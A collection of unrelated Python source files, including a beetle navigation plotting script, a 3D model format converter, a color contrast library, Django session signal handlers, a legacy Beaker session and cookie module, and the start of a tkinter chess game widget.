x.add_to_world(first_roll_world_ax)
x.add_to_world(second_roll_world_ax)
for x in cue_list_roll_one:
x.add_to_world(first_roll_world_ax)
for x in cue_list_roll_two:
x.add_to_world(second_roll_world_ax)
# Get the beetle's behaviour
beetle.compute_first_path(cue_list_roll_one)
beetle.compute_second_path(cue_list_roll_two)
beetle.add_to_world(first_roll_world_ax)
beetle.add_to_world(second_roll_world_ax, draw_bearing_change=True)
beetle.add_to_polar(first_roll_polar_ax)
beetle.add_to_polar(second_roll_polar_ax, draw_bearing_change=True)
# DEBUG #
# print(beetle.get_result_string())
# Plot the 3D world for the first roll
first_roll_world_ax.set_title("Roll 1: 3D World")
first_roll_world_ax.view_init(elev=40, azim=-130)
first_roll_world_ax.set_axis_off()
# Plot the 3D world for the second roll
second_roll_world_ax.set_title("Roll 2: 3D World")
second_roll_world_ax.view_init(elev=40, azim=-130)
second_roll_world_ax.set_axis_off()
# Polar plot configuration
first_roll_polar_ax.set_rticks([])
first_roll_polar_ax.set_rmin(0)
first_roll_polar_ax.set_rmax(1)
first_roll_polar_ax.set_thetalim(-np.pi, np.pi)
first_roll_polar_ax.set_xticks(np.linspace(np.pi, -np.pi, 4, endpoint=False))
first_roll_polar_ax.grid(False)
first_roll_polar_ax.set_theta_direction(-1)
first_roll_polar_ax.set_theta_zero_location("N")
first_roll_polar_ax.set_title("Roll 1: path and cue vector")
second_roll_polar_ax.set_rticks([])
second_roll_polar_ax.set_rmin(0)
second_roll_polar_ax.set_rmax(1)
second_roll_polar_ax.set_thetalim(-np.pi, np.pi)
second_roll_polar_ax.set_xticks(np.linspace(np.pi, -np.pi, 4, endpoint=False))
second_roll_polar_ax.grid(False)
second_roll_polar_ax.set_theta_direction(-1)
second_roll_polar_ax.set_theta_zero_location("N")
second_roll_polar_ax.set_title("Roll 2: path and cue vector")
if conf.display_legend:
# Add legends if they're enabled.
second_roll_world_ax.legend(handles=create_world_legend_handles(), bbox_to_anchor=(1.05, 1))
second_roll_polar_ax.legend(handles=create_polar_legend_handles(), bbox_to_anchor=(1.6, 0.2))
plt.show()
# Print terminal output: this was modified to make the output more readable. Debug statements are still
# available as comments.
print("Project root directory: " + defn.ROOT_DIR)
print("Using configuration file: " + defn.CONFIG_FILE)
conf.print_configuration()
print(beetle.get_result_string())
def wind_and_light_main(cue_info_dictionary):
"""
Dedicated main for the simplified wind and light case for immediate experiments.
This will create a configuration file from information provided externally (through a jupyter
notebook) and then run the software using that configuration.
:param cue_info_dictionary: Dictionary defining the configuration
:return: Unused
"""
from pathfinder.util.serialiser import Serialiser
filename = "jupyter_auto_conf.yaml"
Serialiser.write_configuration_dictionary_to_file(cue_info_dictionary, filename)
main(filename)
if __name__ == '__main__':
# Note to developer: correct the input file to config.yaml after development; noticed a habit of
# leaving it as untracked_config which is, well, untracked so people cloning the repo won't have it!
# TODO: It would be good if this could be set dynamically without needing to change names each time. May be an easy
# TODO: way to do this by using environment variables or similar.
main("config.yaml")
|
import json
import os
import numpy as np
#user adjustable variables
#file
filepath = "D:\SourceCode\Python\Mine imator\Blendbench\converted\OuterTaleGasterBlaster_convert.mimodel"
newFilepath = "D:\SourceCode\Python\Mine imator\Blendbench\converted"
#setting
offset = False
a = 1.05
round = 0
multiplier = 3.75
UVmultiplier = 20
# file variables
filetype = [".json",".mimodel"]
file = os.path.split(filepath)
#default
defaultTexture = "Default texture" # default Inherit texture. Relative file path?
defaultTextureSize = [16,16] # default based on Inherit texture # What does the "texture_size" even do? I don't even know
debug = False
def recalc(value):
newValue = np.round(np.multiply(value,multiplier),round)
return newValue
def worldGrid(offset): # offset worldGrid by (8,0,8) because it doesn't make sense for Blockbench for the world origin at the corner of the grid
pivotOffset = [0,0,0]
if offset == True:
pivotOffset = np.multiply([8,0,8],multiplier)
else:
pass
return pivotOffset
def load(filepath): # Load mimodel and Minecraft json
try:
with open(filepath, "r") as fileObject:
data = json.load(fileObject)
textureIndex = 0
try: # Exception No "textures" found
try:
texture = data["textures"][str(textureIndex)]
except IndexError:
textureIndex+=1
texture = data["textures"][str(textureIndex)]
except KeyError:
texture = defaultTexture
try: # Exception No "textures_size" found
texture_size=data["texture_size"]
except KeyError:
texture_size= defaultTextureSize
elements = data["elements"] # Extract "elements"
return elements, texture, texture_size
except FileNotFoundError:
print('File not found. Please recheck your file or directory make sure it\'s in the right path.')
def convertBlock(filepath,offset):
elements, texture, texture_size, groups = load(filepath)
model = file[1].replace(filetype[0],'')
pivotOffset = worldGrid(offset)
elementList =[]
bbmodel_json = {
"name": model + " converted by Blendbench - zNight Animatics",
"texture_size": texture_size,
"textures": {"0":texture},
"elements": [],
# "groups" : groups
}
for i,element in enumerate(elements):
elementData = element
elementName = elementData["name"]
elementFrom = recalc(elementData["from"] - pivotOffset)
elementTo = recalc(elementData["to"] - pivotOffset)
elementRotate = elementData["rotation"]
elementAngle = elementRotate["angle"]
elementAxis = elementRotate["axis"]
elementOrigin = recalc(elementRotate["origin"] - pivotOffset)
elementOrigin = elementOrigin.tolist()
elementFace = elementData["faces"]
elementRotate = {}
elementRotate["angle"] = elementAngle
elementRotate["axis"] = elementAxis
elementRotate["origin"] = elementOrigin
elementFrom = elementFrom.tolist()
elementTo = elementTo.tolist()
elementList.append({
"name": elementName,
"from": elementFrom,
"to" : elementTo,
"rotation": elementRotate,
"faces": elementFace
})
bbmodel_json["elements"] = elementList
return bbmodel_json
def exportBB(filepath,newFilepath,offset):
path = os.path.split(filepath)[0]+"\\"
file = os.path.split(filepath)[1].replace(filetype[0],'')
bbmodel_json = convertBlock(filepath,offset)
if path == newFilepath:
file = file+"_converted"+filetype[0]
else:
file = file+filetype[0]
newFilepath = newFilepath+"\\"+file
with open(newFilepath, "w") as f:
json.dump(bbmodel_json, f)
def convert(filepath,newFilepath,offset):
exportBB(filepath,newFilepath,offset)
if __name__ == "__main__":
# clear screen
os.system('cls')
convert(filepath,newFilepath,offset)
|
# Desafio 104: Crie um programa que tenha a função leiaInt(), que vai funcionar
# de forma semelhante 'a função input() do Python, só que fazendo a validação
# para aceitar apenas um valor numérico.
from rotinas import var, titulo, err
def leiaInt(texto):
while True:
n = input(texto)
if n.isnumeric():
return int(n)
print(f'{err("Erro: Digite um número inteiro.")}')
titulo('Lendo dados', 40)
numero = leiaInt('Digite um número: ')
print(f'Você digitou {var(numero)} que é um número inteiro.')
|
'''Provide Color class that represents specific colors
This module also provides lists of predefined colors represented as
instances of Color class.
'''
from os import path
import json
from itertools import product
from . import utils
from . import checker
from .threshold_finders import brightness as brightness_finder
from .threshold_finders import lightness as lightness_finder
from .converters import brightness as brightness_conv
from .converters import contrast as contrast_conv
from .converters import grayscale as grayscale_conv
from .converters import hue_rotate as hue_rotate_conv
from .converters import invert as invert_conv
from .converters import saturate as saturate_conv
class Color:
@classmethod
def from_name(cls, name):
"""Return an instance of Color for a predefined color name.
Color names are defined at
https://www.w3.org/TR/SVG/types.html#ColorKeywords
:param name: Name of color
:type name: str
:return: Instance of Color
:rtype: Color
"""
normalized_name = name.lower()
if not normalized_name in NAME_TO_COLOR:
return None
return NAME_TO_COLOR[normalized_name]
@classmethod
def from_rgb(cls, rgb, name=None):
"""Return an instance of Color for a hex color code.
:param rgb: RGB value represented as a tuple of integers such
such as (255, 255, 0)
:type rgb: (int, int, int)
:param name: You can name the color to be created [optional]
:type name: str
:return: an instance of Color
:rtype: Color
"""
hex_code = utils.rgb_to_hex(rgb)
if not name and hex_code in HEX_TO_COLOR:
return HEX_TO_COLOR[hex_code]
return Color(rgb, name)
@classmethod
def from_hex(cls, hex_code, name=None):
"""Return an instance of Color for a hex color code.
:param hex_code: Hex color code such as "#ffff00"
:type hex_code: str
:param name: You can name the color to be created [optional]
:type name: str
:return: an instance of Color
:rtype: Color
"""
normalized_hex = utils.normalize_hex(hex_code)
if not name and normalized_hex in HEX_TO_COLOR:
return HEX_TO_COLOR[normalized_hex]
return Color(normalized_hex, name)
@classmethod
def from_hsl(cls, hsl, name=None):
"""Create an instance of Color from an HSL value.
:param hsl: HSL value represented as a tuple of numbers
:type hsl: (float, float, float)
:param name: You can name the color to be created [optional]
:type name: str
:return: an instance of Color
:rtype: Color
"""
hex_code = utils.hsl_to_hex(hsl)
if not name and hex_code in HEX_TO_COLOR:
return HEX_TO_COLOR[hex_code]
return cls(hex_code, name)
def __init__(self, rgb, name=None):
"""Create an instance of Color.
:param rgb: RGB value represented as a tuple of integers or
hex color code such as "#ffff00"
:type rgb: str or (int, int, int)
:param name: You can name the color to be created.
Without this option, a color keyword name (if
exists) or the value of normalized hex color code
is assigned instead. [optional]
:type name: str
:return: an instance of Color
:rtype: Color
"""
if isinstance(rgb, str):
self.rgb = utils.hex_to_rgb(rgb)
else:
self.rgb = rgb
self.hex = utils.rgb_to_hex(self.rgb)
self.name = name or self.common_name
self.relative_luminance = checker.relative_luminance(self.rgb)
self.__hsl = None
self.__rgb_code = None
def __str__(self):
return self.hex
@property
def hsl(self):
"""Return HSL value of the color.
The value is calculated from the RGB value, so if you create
the instance by Color.from_hsl method, the value used to
create the color does not necessarily correspond to the value
of this property.
:return: HSL value represented as a tuple of numbers
:rtype: (float, float, float)
"""
if self.__hsl is None:
self.__hsl = utils.rgb_to_hsl(self.rgb)
return self.__hsl
@property
def rgb_code(self):
"""Return a string representation of RGB value.
:return: For example if the color is yellow, the return value
is "rgb(255,255,0)".
:rtype: str
"""
if self.__rgb_code is None:
self.__rgb_code = 'rgb({:d},{:d},{:d})'.format(*self.rgb)
return self.__rgb_code
@property
def common_name(self):
"""Return a color keyword name or a hex color code.
A name defined at https://www.w3.org/TR/SVG/types.html will be
returned when the name corresponds to the hex color code of
the color. Otherwise the hex color code will be returned.
:return: Color keyword name or hex color code
:rtype: str
"""
if self.hex in HEX_TO_COLOR:
return HEX_TO_COLOR[self.hex].name
return self.hex
def contrast_ratio_against(self, other_color):
"""Calculate the contrast ratio against another color.
:param other_color: Another instance of Color, RGB value or
hex color code
:type other_color: Color or (int, int, int) or str
:return: Contrast ratio
:rtype: float
"""
if not isinstance(other_color, Color):
return checker.contrast_ratio(self.rgb, other_color)
other_luminance = other_color.relative_luminance
return checker.luminance_to_contrast_ratio(self.relative_luminance,
other_luminance)
def contrast_level(self, other_color):
"""Return the level of contrast ratio defined by WCAG 2.0.
:param other_color: Another instance of Color, RGB value or
hex color code
:type other_color: Color or (int, int, int) or str
:return: "A", "AA" or "AAA" if the contrast ratio meets the
criteria of WCAG 2.0, otherwise "-"
:rtype: str
"""
ratio = self.contrast_ratio_against(other_color)
return checker.ratio_to_level(ratio)
def has_sufficient_contrast(self, other_color,
level=checker.WCAGLevel.AA):
"""Check if the contrast ratio with another color meets a
WCAG 2.0 criterion.
:param other_color: Another instance of Color, RGB value or
hex color code
:type other_color: Color or (int, int, int) or str
:param level: "A", "AA" or "AAA" [optional]
:type level: str
:return: True if the contrast ratio meets the specified level
:rtype: bool
"""
ratio = checker.level_to_ratio(level)
return self.contrast_ratio_against(other_color) >= ratio
def is_same_color(self, other_color):
"""Check it two colors have the same RGB value.
:param other_color: Another instance of Color, RGB value or
hex color code
:type other_color: Color or (int, int, int) or str
:return: True if other_color has the same RGB value
:rtype: bool
"""
if isinstance(other_color, Color):
return self.hex == other_color.hex
if isinstance(other_color, tuple):
return self.hex == utils.rgb_to_hex(other_color)
if isinstance(other_color, str):
return self.hex == utils.normalize_hex(other_color)
return False
def has_max_contrast(self):
"""Check if the color reachs already the max contrast..
The max contrast in this context means that of colors modified
by the operation defined at
https://www.w3.org/TR/filter-effects/#funcdef-contrast
:return: True if self.with_contrast(r) where r is greater
than 100 returns the same color as self.
:rtype: bool
"""
return all(c in (0, 255) for c in self.rgb)
def has_min_contrast(self):
"""Check if the color reachs already the min contrast.
The min contrast in this context means that of colors modified
by the operation defined at
https://www.w3.org/TR/filter-effects/#funcdef-contrast
:return: True if self is the same color as "#808080"
:rtype: bool
"""
return self.rgb == self.GRAY.rgb
def has_higher_luminance(self, other_color):
"""Check if the color has higher luminance than another color.
:param other_color: Another color
:type other_color: Color
:return: True if the relative luminance of self is higher than
that of other_color
:rtype: bool
"""
return self.relative_luminance > other_color.relative_luminance
def has_same_luminance(self, other_color):
"""Check if two colors has the same relative luminance.
:param other_color: Another color
:type other_color: Color
:return: True if the relative luminance of self and other_color
are same.
:rtype: bool
"""
return self.relative_luminance == other_color.relative_luminance
def is_light_color(self):
"""Check if the contrast ratio against black is higher than
against white.
:return: True if the contrast ratio against white is qual to or
less than the ratio against black
:rtype: bool
"""
contrast_ratio_against_white = self.contrast_ratio_against(self.WHITE)
contrast_ratio_against_black = self.contrast_ratio_against(self.BLACK)
return contrast_ratio_against_white <= contrast_ratio_against_black
def with_contrast(self, ratio, name=None):
"""Return a new instance of Color with adjusted contrast.
:param ratio: Adjustment ratio in percentage
:type ratio: float
:param name: You can name the color to be created.
Without this option, the value of normalized hex
color code is assigned instead. [optional]
:type name: str
:return: New color with adjusted contrast
:rtype: Color
"""
return self.__generate_new_color(contrast_conv, ratio, name)
def with_brightness(self, ratio, name=None):
"""Return a new instance of Color with adjusted brightness.
:param ratio: Adjustment ratio in percentage
:type ratio: float
:param name: You can name the color to be created.
Without this option, the value of normalized hex
color code is assigned instead. [optional]
:type name: str
:return: New color with adjusted brightness
:rtype: Color
"""
return self.__generate_new_color(brightness_conv, ratio, name)
def with_invert(self, ratio=100, name=None):
"""Return an inverted color as an instance of Color.
:param ratio: Proportion of the conversion in percentage
:type ratio: float
:param name: You can name the color to be created.
Without this option, the value of normalized hex
color code is assigned instead. [optional]
:type name: str
:return: New inverted color
:rtype: Color
"""
return self.__generate_new_color(invert_conv, ratio, name)
def with_hue_rotate(self, degree, name=None):
"""Return a hue rotation applied color as an instance of Color.
:param ratio: Degrees of rotation (0 to 360)
:type ratio: float
:param name: You can name the color to be created.
Without this option, the value of normalized hex
color code is assigned instead. [optional]
:type name: str
:return: New hue rotation applied color
:rtype: Color
"""
return self.__generate_new_color(hue_rotate_conv, degree, name)
def with_saturate(self, ratio, name=None):
"""Return a saturated color as an instance of Color.
:param ratio: Proprtion of the conversion in percentage
:type ratio: float
:param name: You can name the color to be created.
Without this option, the value of normalized hex
color code is assigned instead. [optional]
:type name: str
:return: New saturated color
:rtype: Color
"""
return self.__generate_new_color(saturate_conv, ratio, name)
def with_grayscale(self, ratio=100, name=None):
"""Return a grayscale of the original color.
:param ratio: Conversion ratio in percentage
:type ratio: float
:param name: You can name the color to be created.
Without this option, the value of normalized hex
color code is assigned instead. [optional]
:type name: str
:return: New grayscale color
:rtype: Color
"""
return self.__generate_new_color(grayscale_conv, ratio, name)
def __generate_new_color(self, calc, ratio, name=None):
new_rgb = calc.calc_rgb(self.rgb, ratio)
return self.__class__(new_rgb, name)
def find_brightness_threshold(self, other_color,
level=checker.WCAGLevel.AA):
"""Try to find a color who has a satisfying contrast ratio.
The returned color is gained by modifying the brightness of
another color. Even when a color that satisfies the specified
level is not found, it returns a new color anyway.
:param other_color: Color before the adjustment of brightness
:type other_color: Color or (int, int, int) or str
:param level: "A", "AA" or "AAA" [optional]
:type level: str
:return: New color whose brightness is adjusted from that of
other_color
:rtype: Color
"""
if not isinstance(other_color, Color):
other_color = Color(other_color)
return Color(brightness_finder.find(self.rgb, other_color.rgb, level))
def find_lightness_threshold(self, other_color,
level=checker.WCAGLevel.AA):
"""Try to find a color who has a satisfying contrast ratio.
The returned color is gained by modifying the lightness of
another color. Even when a color that satisfies the specified
level is not found, it returns a new color anyway.
:param other_color: Color before the adjustment of lightness
:type other_color: Color or (int, int, int) or str
:param level: "A", "AA" or "AAA" [optional]
:type level: str
:return: New color whose brightness is adjusted from that of
other_color
:rtype: Color
"""
if not isinstance(other_color, Color):
other_color = Color(other_color)
return Color(lightness_finder.find(self.rgb, other_color.rgb, level))
_here = path.abspath(path.dirname(__file__))
# named colors: https://www.w3.org/TR/SVG/types.html#ColorKeywords
with open(path.join(_here, 'color_keywords.json')) as f:
_color_keywords = json.loads(f.read())
NAMED_COLORS = tuple(Color(hex, name) for name, hex in _color_keywords)
NAME_TO_COLOR = {color.name: color for color in NAMED_COLORS}
HEX_TO_COLOR = {color.hex: color for color in NAMED_COLORS}
def _generate_web_safe_colors():
colors = []
web_safe_values = [c * 17 for c in range(0, 16, 3)]
for rgb in [tuple(c) for c in sorted(product(web_safe_values, repeat=3))]:
hex_code = utils.rgb_to_hex(rgb)
if hex_code in HEX_TO_COLOR:
colors.append(HEX_TO_COLOR[hex_code])
else:
colors.append(Color(hex_code))
return tuple(colors)
WEB_SAFE_COLORS = _generate_web_safe_colors()
def hsl_colors(s=100, l=50, h_interval=1):
"""Return a list of colors which share the same saturation and
lightness.
By default, so-called pure colors are returned.
:param s: Ratio of saturation in percentage [optional]
:type s: float
:param l: Ratio of lightness in percentage [optional]
:type l: float
:param h_interval: Interval of hues in degrees. By default, it
returns 360 hues beginning from red. [optional]
:type h_interval: int
:return: List of colors
:rtype: list of Color
"""
hues = range(0, 361, h_interval)
return [Color.from_hsl((h, s, l)) for h in hues]
Color.BLACK = Color.from_name('black')
Color.GRAY = Color.from_name('gray')
Color.WHITE = Color.from_name('white')
|
from django.contrib.auth.signals import user_logged_in, user_logged_out
from django.dispatch import receiver
@receiver(user_logged_in)
def on_login(sender, user, request, **kwargs):
user.profile.shopping_cart.clear()
@receiver(user_logged_out)
def on_logout(sender, user, request, **kwargs):
user.profile.shopping_cart.clear()
|
import cPickle
import Cookie
import hmac
import md5
import os
import random
import sha
import sys
import time
import UserDict
from datetime import datetime, timedelta
# Determine if strong crypto is available
crypto_ok = False
# Check for pycryptopp encryption for AES
try:
from pycryptopp.cipher import aes
from beaker.crypto import generateCryptoKeys
crypto_ok = True
except:
pass
from beaker.container import namespace_registry
from beaker.exceptions import BeakerException
from beaker.util import b64decode, b64encode, coerce_session_params
__all__ = ['SignedCookie', 'Session']
class SignedCookie(Cookie.BaseCookie):
"extends python cookie to give digital signature support"
def __init__(self, secret, input=None):
self.secret = secret
Cookie.BaseCookie.__init__(self, input)
def value_decode(self, val):
val = val.strip('"')
sig = hmac.new(self.secret, val[40:], sha).hexdigest()
if sig != val[:40]:
return None, val
else:
return val[40:], val
def value_encode(self, val):
sig = hmac.new(self.secret, val, sha).hexdigest()
return str(val), ("%s%s" % (sig, val))
class Session(UserDict.DictMixin):
"session object that uses container package for storage"
def __init__(self, request, id=None, invalidate_corrupt=False,
use_cookies=True, type=None, data_dir=None,
key='beaker.session.id', timeout=None, cookie_expires=True,
cookie_domain=None, secret=None, secure=False, log_file=None,
namespace_class=None, **kwargs):
if type is None:
if data_dir is None:
self.type = 'memory'
else:
self.type = 'file'
else:
self.type = type
if namespace_class is None:
self.namespace_class = namespace_registry(self.type)
else:
self.namespace_class = namespace_class
self.kwargs = kwargs
self.request = request
self.data_dir = data_dir
self.key = key
self.timeout = timeout
self.use_cookies = use_cookies
self.cookie_expires = cookie_expires
self.cookie_domain = cookie_domain
self.log_file = log_file
self.was_invalidated = False
self.secret = secret
self.secure = secure
self.id = id
if self.use_cookies:
try:
cookieheader = request['cookie']
except KeyError:
cookieheader = ''
if secret is not None:
try:
self.cookie = SignedCookie(secret, input = cookieheader)
except Cookie.CookieError:
self.cookie = SignedCookie(secret, input = None)
else:
self.cookie = Cookie.SimpleCookie(input = cookieheader)
if self.id is None and self.cookie.has_key(self.key):
self.id = self.cookie[self.key].value
if self.id is None:
self._create_id()
else:
self.is_new = False
if not self.is_new:
try:
self.load()
except:
if invalidate_corrupt:
self.invalidate()
else:
raise
else:
self.dict = {}
def _create_id(self):
if hasattr(os, 'getpid'):
pid = os.getpid()
else:
pid = ''
self.id = md5.new(
md5.new("%f%s%f%s" % (time.time(), id({}), random.random(), pid) ).hexdigest(),
).hexdigest()
self.is_new = True
if self.use_cookies:
self.cookie[self.key] = self.id
if self.cookie_domain:
self.cookie[self.key]['domain'] = self.cookie_domain
if self.secure:
self.cookie[self.key]['secure'] = True
self.cookie[self.key]['path'] = '/'
if self.cookie_expires is not True:
if self.cookie_expires is False:
expires = datetime.fromtimestamp( 0x7FFFFFFF )
elif isinstance(self.cookie_expires, timedelta):
expires = datetime.today() + self.cookie_expires
elif isinstance(self.cookie_expires, datetime):
expires = self.cookie_expires
else:
raise ValueError("Invalid argument for cookie_expires: %s"
% repr(self.cookie_expires))
self.cookie[self.key]['expires'] = \
expires.strftime("%a, %d-%b-%Y %H:%M:%S GMT" )
self.request['cookie_out'] = self.cookie[self.key].output(header='')
self.request['set_cookie'] = False
created = property(lambda self: self.dict['_creation_time'])
def delete(self):
"""deletes the persistent storage for this session, but remains valid. """
self.namespace.acquire_write_lock()
try:
self.namespace.remove()
finally:
self.namespace.release_write_lock()
def __getitem__(self, key):
return self.dict.__getitem__(key)
def __setitem__(self, key, value):
self.dict.__setitem__(key, value)
def __delitem__(self, key):
del self.dict[key]
def keys(self):
return self.dict.keys()
def __contains__(self, key):
return self.dict.has_key(key)
def has_key(self, key):
return self.dict.has_key(key)
def __iter__(self):
return iter(self.dict.keys())
def iteritems(self):
return self.dict.iteritems()
def invalidate(self):
"invalidates this session, creates a new session id, returns to the is_new state"
namespace = self.namespace
namespace.acquire_write_lock()
try:
namespace.remove()
finally:
namespace.release_write_lock()
self.was_invalidated = True
self._create_id()
self.load()
def load(self):
"loads the data from this session from persistent storage"
self.namespace = self.namespace_class(self.id, data_dir=self.data_dir,
digest_filenames=False, **self.kwargs)
namespace = self.namespace
self.request['set_cookie'] = True
namespace.acquire_write_lock()
try:
self.debug("session loading keys")
self.dict = {}
now = time.time()
if not namespace.has_key('_creation_time'):
namespace['_creation_time'] = now
self.is_new = True
try:
self.accessed = namespace['_accessed_time']
namespace['_accessed_time'] = now
except KeyError:
namespace['_accessed_time'] = self.accessed = now
if self.timeout is not None and now - self.accessed > self.timeout:
self.invalidate()
else:
for k in namespace.keys():
self.dict[k] = namespace[k]
finally:
namespace.release_write_lock()
def save(self):
"saves the data for this session to persistent storage"
if not hasattr(self, 'namespace'):
curdict = self.dict
self.load()
self.dict = curdict
self.namespace.acquire_write_lock()
try:
self.debug("session saving keys")
todel = []
for k in self.namespace.keys():
if not self.dict.has_key(k):
todel.append(k)
for k in todel:
del self.namespace[k]
for k in self.dict.keys():
self.namespace[k] = self.dict[k]
self.namespace['_accessed_time'] = self.dict['_accessed_time'] \
= time.time()
self.namespace['_creation_time'] = self.dict['_creation_time'] \
= time.time()
finally:
self.namespace.release_write_lock()
if self.is_new:
self.request['set_cookie'] = True
def lock(self):
"""locks this session against other processes/threads. this is
automatic when load/save is called.
***use with caution*** and always with a corresponding 'unlock'
inside a "finally:" block,
as a stray lock typically cannot be unlocked
without shutting down the whole application.
"""
self.namespace.acquire_write_lock()
def unlock(self):
"""unlocks this session against other processes/threads. this is
automatic when load/save is called.
***use with caution*** and always within a "finally:" block,
as a stray lock typically cannot be unlocked
without shutting down the whole application.
"""
self.namespace.release_write_lock()
def debug(self, message):
if self.log_file is not None:
self.log_file.write(message)
class CookieSession(Session):
"""Pure cookie-based session
Options recognized when using cookie-based sessions are slightly
more restricted than general sessions.
``key``
The name the cookie should be set to.
``timeout``
How long session data is considered valid. This is used
regardless of the cookie being present or not to determine
whether session data is still valid.
``encrypt_key``
The key to use for the session encryption, if not provided the session
will not be encrypted.
``validate_key``
The key used to sign the encrypted session
``cookie_domain``
Domain to use for the cookie.
``secure``
Whether or not the cookie should only be sent over SSL.
"""
def __init__(self, request, key='beaker.session.id', timeout=None,
cookie_expires=True, cookie_domain=None, encrypt_key=None,
validate_key=None, secure=False, **kwargs):
if not crypto_ok and encrypt_key:
raise BeakerException("pycryptopp is not installed, can't use "
"encrypted cookie-only Session.")
self.request = request
self.key = key
self.timeout = timeout
self.cookie_expires = cookie_expires
self.cookie_domain = cookie_domain
self.encrypt_key = encrypt_key
self.validate_key = validate_key
self.request['set_cookie'] = False
self.secure = secure
try:
cookieheader = request['cookie']
except KeyError:
cookieheader = ''
if validate_key is None:
raise BeakerException("No validate_key specified for Cookie only Session.")
try:
self.cookie = SignedCookie(validate_key, input=cookieheader)
except Cookie.CookieError:
self.cookie = SignedCookie(validate_key, input=None)
self.dict = {}
self.dict['_id'] = self._make_id()
self.is_new = True
# If we have a cookie, load it
if self.key in self.cookie and self.cookie[self.key].value is not None:
self.is_new = False
try:
self.dict = self._decrypt_data()
except:
self.dict = {}
if self.timeout is not None and time.time() - self.dict['_accessed_time'] > self.timeout:
self.dict = {}
self._create_cookie()
created = property(lambda self: self.dict['_creation_time'])
id = property(lambda self: self.dict['_id'])
def _encrypt_data(self):
"""Cerealize, encipher, and base64 the session dict"""
if self.encrypt_key:
nonce = b64encode(os.urandom(40))[:8]
encrypt_key = generateCryptoKeys(self.encrypt_key, self.validate_key + nonce, 1)
ctrcipher = aes.AES(encrypt_key)
data = cPickle.dumps(self.dict, protocol=2)
return nonce + b64encode(ctrcipher.process(data))
else:
data = cPickle.dumps(self.dict, protocol=2)
return b64encode(data)
def _decrypt_data(self):
"""Bas64, decipher, then un-cerealize the data for the session dict"""
if self.encrypt_key:
nonce = self.cookie[self.key].value[:8]
encrypt_key = generateCryptoKeys(self.encrypt_key, self.validate_key + nonce, 1)
ctrcipher = aes.AES(encrypt_key)
payload = b64decode(self.cookie[self.key].value[8:])
data = ctrcipher.process(payload)
return cPickle.loads(data)
else:
data = b64decode(self.cookie[self.key].value)
return cPickle.loads(data)
def _make_id(self):
return md5.new(md5.new(
"%f%s%f%d" % (time.time(), id({}), random.random(), os.getpid())
).hexdigest()
).hexdigest()
def save(self):
"saves the data for this session to persistent storage"
self._create_cookie()
def _create_cookie(self):
if '_creation_time' not in self.dict:
self.dict['_creation_time'] = time.time()
if '_id' not in self.dict:
self.dict['_id'] = self._make_id()
self.dict['_accessed_time'] = time.time()
val = self._encrypt_data()
if len(val) > 4064:
raise BeakerException("Cookie value is too long to store")
self.cookie[self.key] = val
if self.cookie_domain:
self.cookie[self.key]['domain'] = self.cookie_domain
if self.secure:
self.cookie[self.key]['secure'] = True
self.cookie[self.key]['path'] = '/'
if self.cookie_expires is not True:
if self.cookie_expires is False:
expires = datetime.fromtimestamp( 0x7FFFFFFF )
elif isinstance(self.cookie_expires, timedelta):
expires = datetime.today() + self.cookie_expires
elif isinstance(self.cookie_expires, datetime):
expires = self.cookie_expires
else:
raise ValueError("Invalid argument for cookie_expires: %s"
% repr(self.cookie_expires))
self.cookie[self.key]['expires'] = \
expires.strftime("%a, %d-%b-%Y %H:%M:%S GMT" )
self.request['cookie_out'] = self.cookie[self.key].output(header='')
self.request['set_cookie'] = True
def delete(self):
# Clear out the cookie contents, best we can do
self.dict = {}
self._create_cookie()
# Alias invalidate to delete
invalidate = delete
class SessionObject(object):
"""Session proxy/lazy creator
This object proxies access to the actual session object, so that in the
case that the session hasn't been used before, it will be setup. This
avoid creating and loading the session from persistent storage unless
its actually used during the request.
"""
def __init__(self, environ, **params):
self.__dict__['_params'] = params
self.__dict__['_environ'] = environ
self.__dict__['_sess'] = None
self.__dict__['_headers'] = []
def _session(self):
"""Lazy initial creation of session object"""
if self.__dict__['_sess'] is None:
params = self.__dict__['_params']
environ = self.__dict__['_environ']
self.__dict__['_headers'] = req = {'cookie_out':None}
req['cookie'] = environ.get('HTTP_COOKIE')
if params.get('type') == 'cookie':
self.__dict__['_sess'] = CookieSession(req, **params)
else:
self.__dict__['_sess'] = Session(req, use_cookies=True, **params)
return self.__dict__['_sess']
def __getattr__(self, attr):
return getattr(self._session(), attr)
def __setattr__(self, attr, value):
setattr(self._session(), attr, value)
def __delattr__(self, name):
self._session().__delattr__(name)
def __getitem__(self, key):
return self._session()[key]
def __setitem__(self, key, value):
self._session()[key] = value
def __delitem__(self, key):
self._session().__delitem__(key)
def __repr__(self):
return self._session().__repr__()
def __iter__(self):
"""Only works for proxying to a dict"""
return iter(self._session().keys())
def __contains__(self, key):
return self._session().has_key(key)
def get_by_id(self, id):
params = self.__dict__['_params']
session = Session({}, use_cookies=False, id=id, **params)
if session.is_new:
session.namespace.remove()
return None
return session
|
# game.py
# Copyright 2008 Roger Marsh
# Licence: See LICENCE (BSD licence)
"""Widget to display a game of chess.
The display contains the game score, a board with the current position in the
game, and any analysis of the current position by chess engines.
The Game class displays a game of chess.
Instances of Game have an instance of score.Score as an attribute to display
chess engine analysis as well as inheriting much of their function from the
Score class.
An instance of Game fits into the user interface in two ways: as an item in a
panedwindow of the main widget, or as the only item in a new toplevel widget.
"""
# Obsolete comment, but the idea is being realised through the displaypgn and
# displaytext modules. (partial has meanwhile become cql).
# Game (game.py) and Partial (partial.py) should be
# subclasses of some more basic class. They are not because Game started
# as a game displayer while Partial started as a Text widget with no
# validation and they have been converging ever since. Next step will get
# there. Obviously this applies to subclasses GameEdit (gameedit.py)
# and PartialEdit (partialedit.py) as well.
# Score is now a superclass of Game. It is a PGN handling class, not the
# 'more basic class' above.
import tkinter
from pgn_read.core.constants import (
TAG_FEN,
)
from pgn_read.core.parser import PGN
from pgn_read.core.game import generate_fen_for_position
from ..core.pgn import (
GameDisplayMoves,
GameAnalysis,
)
from .board import Board
from .score import Score, AnalysisScore, ScoreNoGameException
from .constants import (
ANALYSIS_INDENT_TAG,
ANALYSIS_PGN_TAGS_TAG,
MOVETEXT_INDENT_TAG,
FORCED_INDENT_TAG,
MOVETEXT_MOVENUMBER_TAG,
STATUS_SEVEN_TAG_ROSTER_PLAYERS,
)
from .eventspec import EventSpec
from ..core.analysis import Analysis
from ..core.constants import (
UNKNOWN_RESULT,
END_TAG,
START_TAG,
)
class Game(Score):
"""Chess game widget composed from Board and Text widgets.
master is used as the master argument for the tkinter Frame widget passed
to superclass and the Board call.
ui is used as the ui argument in the Board call, and bound to the ui
attribute of self.
